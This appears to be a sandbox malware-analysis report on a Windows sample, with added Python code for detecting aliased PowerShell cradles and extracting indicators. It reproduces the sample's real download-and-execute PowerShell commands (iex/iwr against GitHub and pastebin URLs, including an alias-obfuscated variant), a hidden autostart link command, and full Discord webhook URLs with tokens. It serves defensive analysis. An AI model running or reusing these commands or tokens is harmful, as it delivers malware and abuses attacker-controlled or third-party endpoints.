Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3391
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1657
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep count: 814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6256Thread sleep count: 295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5992Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 4416 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep count: 5397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep count: 1657 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688Thread sleep count: 183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep count: 3982 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 692Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep count: 5820 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000010.00000002.2922437661.000001D621E00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: powershell.exe, 00000004.00000002.2601758086.0000024220540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2819373570.000001C72A5A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C52370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (two identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (two identical entries)
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C52514 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C51E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Note: the IsProcessorFeaturePresent / RtlCaptureContext / RtlVirtualUnwind / IsDebuggerPresent / SetUnhandledExceptionFilter sequence and the SetUnhandledExceptionFilter / UnhandledExceptionFilter / TerminateProcess sequence are the MSVC CRT's /GS-failure (__report_gsfailure) and fast-fail stubs, which are compiled into every x64 MSVC binary; on their own they are not evidence of deliberate anti-debugging, and the SeDebugPrivilege adjustment comes from powershell.exe, not the sample.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" (two identical entries)
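The two PowerShell command lines above are the same download-and-execute cradle written twice. The first calls iex(iwr ...) literally. The second hides both cmdlets behind Set-Alias (sal): callit becomes iex, and the alias name for iwr is the value of $env:OS, which is Windows_NT on every Windows host, so the bare token WINDOWS_NT invokes Invoke-WebRequest; sal fatbake calc is a decoy. A command-line rule that only matches the strings iex and iwr catches the first form and misses the second. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it resolves sal/Set-Alias definitions (including an alias whose name comes from $env:, assuming $env:OS = Windows_NT) back to canonical cmdlets before applying the cradle rule. The two report command lines are copied verbatim; the two benign controls are constructed, and example.com is a placeholder host.

```python
import re

# Canonical cmdlet for each built-in alias / full name that appears in download cradles.
CANONICAL = {
    "iex": "Invoke-Expression", "invoke-expression": "Invoke-Expression",
    "iwr": "Invoke-WebRequest", "curl": "Invoke-WebRequest", "wget": "Invoke-WebRequest",
    "invoke-webrequest": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod", "invoke-restmethod": "Invoke-RestMethod",
}
DOWNLOADERS = {"Invoke-WebRequest", "Invoke-RestMethod"}

# Assumed victim environment: on Windows, $env:OS expands to Windows_NT.
ENV = {"os": "Windows_NT"}

# sal <name> <target>   or   Set-Alias [-Name] <name> [-Value] <target>
ALIAS_RE = re.compile(
    r"\b(?:sal|set-alias)\s+(?:-name\s+)?(\$env:\w+|[\w-]+)\s+(?:-value\s+)?([\w-]+)",
    re.IGNORECASE)
# Bare word tokens; a word glued to a path or URL by . / : \ @ - is not a command.
TOKEN_RE = re.compile(r"(?<![\w./:@\\-])[A-Za-z_][\w-]*")
# Remote locations, with or without a scheme (the cradle omits it).
URL_RE = re.compile(r"(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}/[\w./~-]+", re.IGNORECASE)


def resolve_aliases(cmdline):
    """Map each script-defined alias (lower-cased) to the canonical cmdlet it
    finally points at. Aliases of harmless targets (sal fatbake calc) drop out,
    and an alias of an alias is followed one hop at a time."""
    defined = {}
    for name, target in ALIAS_RE.findall(cmdline):
        if name.lower().startswith("$env:"):
            name = ENV.get(name[5:].lower(), name)      # $env:os -> Windows_NT
        canon = CANONICAL.get(target.lower()) or defined.get(target.lower())
        if canon:
            defined[name.lower()] = canon
    return defined


def analyze(cmdline):
    """Which cradle cmdlets does this command line invoke, directly or through
    an alias, and does it reference a remote URL? Returns the verdict dict."""
    table = dict(CANONICAL)
    defined = resolve_aliases(cmdline)
    table.update(defined)
    invoked = {table[t.lower()] for t in TOKEN_RE.findall(cmdline) if t.lower() in table}
    urls = URL_RE.findall(cmdline)
    return {
        "invoked": sorted(invoked),
        "urls": urls,
        "custom_aliases": defined,
        "alias_obfuscated": bool(defined),
        "is_cradle": "Invoke-Expression" in invoked and bool(invoked & DOWNLOADERS) and bool(urls),
    }


# Sample command lines: the first two are copied from the report, the last two
# are constructed benign controls (example.com is a placeholder host).
SAMPLES = {
    "report_plain": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)',
    "report_aliased": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"',
    "benign_admin": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-ChildItem C:\Temp | Measure-Object"',
    "benign_download": r'powershell.exe -c "iwr https://example.com/installer.msi -OutFile C:\Temp\installer.msi"',
}


def scan(samples=SAMPLES):
    """Run analyze() over every sample; returns {label: verdict}."""
    return {label: analyze(cmd) for label, cmd in samples.items()}


if __name__ == "__main__":
    for label, verdict in scan().items():
        flag = "CRADLE" if verdict["is_cradle"] else "ok"
        extra = " (alias-obfuscated)" if verdict["alias_obfuscated"] else ""
        print(f"{label:16} {flag}{extra}: {verdict['invoked']} {verdict['urls']}")
```

Both report lines come back as cradles; the aliased one additionally reports custom_aliases of callit and windows_nt, which is itself a strong signal: legitimate scripts rarely create an alias for iex or iwr on the command line, so alias_obfuscated alone is worth an alert even when the resolver cannot follow the chain. The plain download control is not flagged because nothing executes the response.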
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (49 entries across the powershell.exe instances, listed once per target):
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
  C:\ VolumeInformation
  C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\OSLdZanXNc.exe | Code function: 0_2_00007FF674C52250 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter (this is the MSVC CRT's __security_init_cookie, which seeds the /GS stack cookie from these four values; it is present in every MSVC binary and is not sample-specific time discovery)
MITRE ATT&CK Matrix, listed per tactic. Bracketed numbers are the hit counts printed in the report next to observed techniques; techniques without a number were not observed.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [111]; PowerShell [2]; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Registry Run Keys / Startup Folder [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [11]; Registry Run Keys / Startup Folder [11]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [11]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Steganography; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery [1]; Security Software Discovery [121]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service [1]; Encrypted Channel [11]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [15]; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID: 1534108, Sample: OSLdZanXNc.exe, Start date: 15/10/2024, Architecture: WINDOWS, Score: 84)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: PowerShell Download and Execution Cradles; Sigma detected: Suspicious PowerShell Parameter Substring

Contacted hosts:
  pastebin.com: 104.20.4.235:443 (CLOUDFLARENETUS, United States), local ports 55613, 55614; contacted by powershell.exe (node 34); signature: Connects to a pastebin service (likely for C&C)
  raw.githubusercontent.com: 185.199.109.133:443 (FASTLYUS, Netherlands), local ports 49711, 49712; contacted by powershell.exe (node 29)
  discord.com: 162.159.138.232:443 (CLOUDFLARENETUS, United States), local ports 55611, 55624; contacted by powershell.exe (node 29)

Process tree (graph node numbers in parentheses; per-node counts shown in square brackets as printed in the graph):
  OSLdZanXNc.exe (9) [1]
    powershell.exe (16) [12]
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Powershell creates an autostart link
      powershell.exe (29) [15 18]
        drops C:\ProgramData\...\BeginSync.lnk (MS); connects to raw.githubusercontent.com and discord.com; signature: Tries to open files direct via NTFS file id
        conhost.exe (38)
        attrib.exe (40) [1]
    conhost.exe (19)
  forfiles.exe (11) [1]
    signature: Suspicious powershell command line found
    powershell.exe (21) [7]
      powershell.exe (34) [13]
        connects to pastebin.com
    conhost.exe (23) [1]
  forfiles.exe (14) [1]
    powershell.exe (25)
      powershell.exe (36)
    conhost.exe (27) [1]

Antivirus detection (Source | Detection | Scanner | Label | Link):
OSLdZanXNc.exe | 0% | ReversingLabs | |
No Antivirus matches (three identical entries)
URL reputation (Source | Detection | Scanner | Label | Link):
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
discord.com | 162.159.138.232 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown
URLs (Name | Malicious | Antivirus Detection | Reputation):
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI | true | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt | false | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
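All three contacted hosts in the tables above (raw.githubusercontent.com, pastebin.com, discord.com) are shared services, so a domain-level block would break legitimate traffic and a domain-level alert would be noisy; the usable indicators are path-level: the GitHub repository, the paste ID and the Discord webhook IDs. The Python below is an added example, not part of the Joe Sandbox report: it takes the URL rows exactly as printed in the table, collapses the http/https and path variants of each indicator into one entry, carries the strongest Malicious verdict seen for it, and defangs the URLs for tickets. Note that a Discord webhook URL contains its own token; whoever holds the full URL can post to the webhook or delete it with an unauthenticated DELETE request to that URL, which is why the key below keeps only the webhook ID and why the full URL should not be pasted into shared tooling.

```python
from urllib.parse import urlsplit

# Rows copied from the report's URL table: (url, value of the "Malicious" column).
REPORT_URLS = [
    ("https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt", False),
    ("http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt", False),
    ("https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI", True),
    ("https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt", False),
    ("http://pastebin.com/raw/sA04Mwk2", False),
    ("https://pastebin.com/raw/sA04Mwk2", False),
    ("https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2", True),
    ("https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll", True),
]

# Hosts that carry legitimate traffic: never block by name, only by the
# path-level identifier that classify() extracts.
SHARED_HOSTS = {"raw.githubusercontent.com", "pastebin.com", "discord.com"}


def classify(url):
    """Reduce a URL to (kind, key, host), where key is the identifier an
    operator can act on. Unknown hosts fall through as a plain URL indicator."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    segs = [s for s in parts.path.split("/") if s]
    if host == "raw.githubusercontent.com" and len(segs) >= 2:
        return "github_repo", f"{segs[0]}/{segs[1]}", host      # owner/repo
    if host == "pastebin.com" and len(segs) >= 2 and segs[0] == "raw":
        return "paste_id", segs[1], host
    if host == "discord.com" and segs[:2] == ["api", "webhooks"] and len(segs) >= 3:
        return "discord_webhook", segs[2], host                  # ID only; the token is a secret
    return "url", url, host


def defang(url):
    """Make a URL safe to paste into tickets and chat: hxxp, [:] and [.]."""
    scheme, rest = url.split("://", 1)
    return scheme.replace("http", "hxxp") + "[:]//" + rest.replace(".", "[.]")


def build_iocs(rows):
    """Collapse scheme/path variants of the same indicator into one entry,
    keeping every defanged URL seen and the strongest 'malicious' verdict."""
    iocs = {}
    for url, malicious in rows:
        kind, key, host = classify(url)
        entry = iocs.setdefault((kind, key), {
            "kind": kind, "key": key, "host": host, "urls": [],
            "malicious": False, "block_domain": host not in SHARED_HOSTS,
        })
        entry["urls"].append(defang(url))
        entry["malicious"] = entry["malicious"] or malicious
    return [iocs[k] for k in sorted(iocs)]


if __name__ == "__main__":
    for ioc in build_iocs(REPORT_URLS):
        scope = "block domain" if ioc["block_domain"] else "block path only (shared host)"
        print(f"{ioc['kind']:16} {ioc['key']:40} malicious={ioc['malicious']!s:5} {scope}")
        for u in ioc["urls"]:
            print("    ", u)
```

On the report's rows this yields four indicators: the two webhook IDs, the single GitHub repository behind all four raw.githubusercontent.com URLs (flagged malicious because the DriverDiag.dll row is), and the paste ID. The table marks the pastebin and GitHub text URLs as not malicious even though they are the stages of the loader chain, which is a reminder that the Malicious column reflects reputation lookups, not the role of the URL in this sample.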
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.microsoft.c4powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://discord.compowershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2922437661.000001D621E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A389000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNpowershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000C.00000002.2784074879.000001C712E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000004.00000002.2573186277.0000024208BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://raw.githubusercontpowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmptrue
                                      unknown
                                      https://discord.com/powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmptrue
                                        unknown
                                        http://discord.compowershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              https://0.discorpowershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_cryptpowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://raw.githubusercontent.compowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_cryptepowershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://crl.mwpowershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
Name: http://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420920F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: http://raw.githubusconte (truncated string as found in memory)
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

Name: https://aka.ms/pscore68
